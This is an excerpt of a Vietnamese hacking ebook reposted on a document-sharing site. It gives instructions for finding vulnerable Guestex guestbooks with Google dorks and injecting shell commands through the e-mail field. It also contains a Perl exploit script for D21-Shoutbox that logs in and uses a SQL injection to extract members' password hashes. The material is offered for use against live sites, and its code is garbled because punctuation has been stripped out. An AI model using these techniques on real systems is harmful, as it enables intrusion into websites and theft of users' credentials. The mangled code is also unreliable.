TAILIEUCHUNG - Hacker Professional Ebook part 451

Ebook giới thiệu các công cụ và đồ nghề cần thiết cho việc Hack-Security. Ebook gồm có 1177 bài viết trong 28 chủ đề chính Phần 45: 10 part gồm Lịch sử Hacker, Hacking - Security Sites. | Guestex Shell Command Execution Vulnerability Hưởng ứng với mọi người 1 chút Tuy hơi cũ nhưng hiện tại vẫn dùng được Q Đầu tiên search bản dính lỗi. Mình dùng allinurl trên google. Lỗi trong file cho phép ta thực hiện shell command. Ở trong guestbook tại phần your e-mail ta điền someone @somewhere. com command here Có thể thử trên site sau http Tham khảo Pip VNISS D21-Shoutbox version exploit Code usr bin perl D21-Shoutbox Author longnhi Exploit Coded by Windak langtuhaohoa We are - use HTTP Cookies use LWP use HTTP Request variables my login_page act Login CODE 01 my id my table_fix my pose_pm_page my tries 5 my sql my i my j objects my ua LWP UserAgent- new my cj HTTP Cookies- new file N A autosave 0 my resp init the cookie jar ua- cookie_jar cj allow redirects on post requests push @ ua- requests_redirectable POST get user input print Forum Use D21-Shoutbox URL chomp my base_url STDIN print Your username chomp my user STDIN form entered_name user print Your pass systems without stty will error otherwise my stty -x bin stty system stty -echo if stty chomp my pass STDIN system stty echo if stty print n if stty print id you want get hashpass chomp my id STDIN print Table prefix ex ibf_ chomp my table_fix STDIN to turn off echoing to turn it back on it ll say next to one of their posts parse the given base url if base_url m Ahttp base_url http . base_url if base_url m index .php base_url . do resp ua- post base_url . login_page UserName user PassWord pass CookieDate 1 while tries-- resp- is_success did we get 200 OK if resp- is_success die Error . resp- status_line . n was the pass right if resp- content sorry the password was wrong i die Error password incorrect. n 1 print nAttempting to extract password hash from database. n sql act Shoutbox view mycp sub ignored do add id -1 union select member_login_key 1 1 from . table_fix. members where id . id . resp ua- get base_url .

TAILIEUCHUNG - Chia sẻ tài liệu không giới hạn
Địa chỉ : 444 Hoang Hoa Tham, Hanoi, Viet Nam
Website : tailieuchung.com
Email : tailieuchung20@gmail.com
Tailieuchung.com là thư viện tài liệu trực tuyến, nơi chia sẽ trao đổi hàng triệu tài liệu như luận văn đồ án, sách, giáo trình, đề thi.
Chúng tôi không chịu trách nhiệm liên quan đến các vấn đề bản quyền nội dung tài liệu được thành viên tự nguyện đăng tải lên, nếu phát hiện thấy tài liệu xấu hoặc tài liệu có bản quyền xin hãy email cho chúng tôi.
Đã phát hiện trình chặn quảng cáo AdBlock
Trang web này phụ thuộc vào doanh thu từ số lần hiển thị quảng cáo để tồn tại. Vui lòng tắt trình chặn quảng cáo của bạn hoặc tạm dừng tính năng chặn quảng cáo cho trang web này.